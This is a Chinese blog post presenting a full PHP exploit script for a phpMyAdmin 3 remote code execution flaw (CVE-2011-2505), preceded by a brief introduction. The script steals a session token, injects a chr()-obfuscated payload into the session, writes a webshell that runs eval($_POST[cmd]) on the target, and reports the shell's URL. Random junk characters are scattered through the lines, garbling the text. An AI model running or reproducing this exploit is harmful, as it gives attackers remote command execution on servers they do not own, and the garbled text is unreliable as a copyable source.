phpadmin3 remote code execute php版本exploit

admin

最近在家做专职奶爸，不谙圈内事很多months了，博客也无更新。
5 C0 G/ c# D) z$ i  z0 v
昨夜带孩子整夜未眠，看到黑哥在php security群里关于phpmyadmin3漏洞的讨论，虽然之前没看过漏洞代码，不过前段时间还是在微博上看到wofeiwo的exp了，不过据黑哥说有不鸡肋的利用方法，于是夜里翻代码出来研究了翻，写出了这个冷饭exp，由于我搞的晚了，之前已经很多人研究了写exp了，于是我这个属于炒冷饭，权当研究研究打发时间了。

. m9 N' J7 B% ?  ?首先赞下wofeiwo的python版本的exp，再赞下wofeiwo跟superhei的钻研精神，学习的榜样啊。不过之前那个exp利用起来是有一些限制的：
一是session.auto_start = 1；
9 ?* }& ^  t  `/ b( |二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
, W% M" D2 W* ?4 y' P9 a- u$ u当然还有第三点大家都不可以逾越的鸿沟：config目录存在且可写。
3 R& x8 U* W4 [- B
* M9 f/ f  x. f3 S$ ?  m& h在群里看了黑哥的发言后，再看了下代码，发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。

于是写了这个php版本的exp，代码如下：

#!/usr/bin/php
* K' J$ e7 `0 _<?php
9 S1 m1 Q4 R9 t0 @print_r('
+---------------------------------------------------------------------------+
7 n6 u6 U7 P  S* xpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
. \  K9 s+ c! l  p7 lby oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
4 J6 i) {8 d$ X% x');

- K$ H* Z# u; }- J/**
* working when the directory:"config" exists and is writeable.
3 `" v1 H  r' s; t; `**/

if ($argc < 3) {
$ S, _0 k$ q8 d" f' d$ R    print_r('
! H+ f" n2 l" X; q* E+ N+---------------------------------------------------------------------------+
) {, \6 p% U8 t2 pUsage: php '.$argv[0].' host path
host:      target server (ip/hostname)
/ @+ q4 s& m2 Q' O$ ^! apath:      path to pma3
Example:
" t! |; Y7 a; a5 {0 X$ E+ `php '.$argv[0].' localhost /pma/
2 Q+ h; E. M+ {" S: R9 z8 _2 G4 M+---------------------------------------------------------------------------+
% x+ E" ^( M4 z. ?7 R');
    exit;
}

$host = $argv[1];
$path = $argv[2];

3 h! f' M. R) @0 f% u& E' J8 w/**
- R, t$ k) k" Z# J* b$ y, Z$ K% j * Try to determine if the directory:"config" exists
& y! ^6 r; |  z**/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
1 V1 @' C1 @+ n% O& s    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}
) n6 G/ {4 n3 R: R' L& m
/**
7 v  ]  y1 s/ f2 S+ T( z: B * Try to get token and sessionid
**/
echo "[+] Try to get token and sessionid....\n";
# ?$ w& C0 n7 J7 g. |# v$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
    echo "[+] tokentoken\n";
    echo "[+] Session IDsessionid\n";
! Q; W6 q1 H& l/ f}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
4 Q- J; v& p' p7 T}

/**
) m0 n( T! l; o" |+ o * Try to insert shell into session
. w1 y* b  s& X$ B1 ^7 [**/
- d& {  G" ]2 ^  R& K' hecho "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
" }% Z$ u2 K- t$ J
/**
$ L: q6 f/ K: b3 b% Q: q; S * Try to create webshell
6 c6 M! J, H! v7 }**/
# e1 ?7 z3 I9 V, a3 J1 B7 Aecho "[+] Try to create webshell....\n";
& g6 }$ U* L/ d+ ~$ P( Bphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
/**
* Try to check if the webshell was created successfully
**/
1 y( W/ W5 T5 G# q8 J6 m/ M( gecho "[+] Try to check if the webshell was created successfully....\n";
! K; d8 F5 k, }) H; g8 h9 ^, x$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Expoilt successfully....\n";
5 a! N: h, x+ b    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
6 |& @( x+ U+ O: b8 s: ]}else{
, p9 A' l" d8 Q8 P6 I    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
; g& a6 M( n0 I- h2 E) H2 ?}
( x7 C" _/ g* a2 \8 v7 _
/ N1 x: \5 e5 C, L  g% }4 A2 [( ofunction php_request($url,$data='',$cookie=''){
    global  $host, $path;
   
' c/ Q# P5 g% H# z* P) N6 [    $method=$data?'POST':'GET';
   
6 C1 L: e. O4 D' D0 b    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
+ W0 s3 @5 C7 B5 `/ W' j6 L    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
# W' M( V; j( F# E+ W+ ]/ e    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
. X2 L6 ~4 R6 a8 N2 B, s6 x    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
) H9 N% D. G4 q" o    $packet .= $data?$data:"";
9 H, L3 _1 f, Z. G  Y) |
    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
    echo 'No response from '.$host; die;
5 d5 V9 `, q, C/ D- h    }
# g; J6 w' C9 \9 Y7 y    fputs($fp, $packet);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
/ n! C2 y0 Y, d! z/ f+ X: H
' Q8 l3 ]2 j8 n0 z% G    return $resp;
}
- p1 U- M: w9 \5 L9 K$ W8 P& J3 z   
?>
) u. Y6 C: ]7 O.